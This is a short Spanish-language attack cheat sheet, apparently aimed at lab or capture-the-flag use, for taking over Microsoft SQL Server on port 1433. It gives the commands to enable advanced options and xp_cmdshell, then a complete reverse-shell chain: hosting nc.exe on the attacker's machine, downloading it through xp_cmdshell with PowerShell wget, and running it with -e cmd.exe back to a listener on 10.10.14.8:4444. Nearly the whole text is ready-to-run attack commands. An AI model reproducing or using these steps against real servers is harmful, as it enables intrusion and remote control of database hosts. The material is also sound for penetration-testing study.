A continuación tienes los comandos para saber como ejecutar comandos con XP_CMDSHELL y habilitar las ADVANCED OPTIONS desde la Base de Datos de Microsoft SQL Server o también abreviada (MSSQL).
Ten en cuenta que existen más formas de atacar una máquina a través del puerto 1433 (MSSQL).
- Leer archivos con XP_DIRTREE
Habilitar Opciones Avanzadas MSSQL
En algunos casos tu usuario quizás no tenga permiso como para activar esta opción.
SQL> SP_CONFIGURE "show advanced options", 1
SQL> RECONFIGUREHabilitar XP_CMDSHELL MSSQL
En algunos casos tu usuario quizás no tenga permiso como para activar esta opción.
SQL> SP_CONFIGURE "xp_cmdshell", 1
SQL> RECONFIGUREReverse shell con XP_CMDSHELL
Ahora podrás obtener una SHELL interactiva para ejecutar comandos simplemente haciendo la reverse shell a tu máquina Kali o Parrot.
Primero ábrete un servidor con python3 donde tengas el programa nc.exe
KALI> python3 -m http.server 8000Ahora ejecutas los siguientes comandos en la consola de MSSQL con XP_CMDSHELL.
SQL> xp_cmdshell "powershell.exe wget http://10.10.14.8:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"
SQL> xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 10.10.14.8 4444"IP Atacante (Tú IP): 10.10.14.8
Puerto en escucha: 4444
KALI> nc -lvp 4444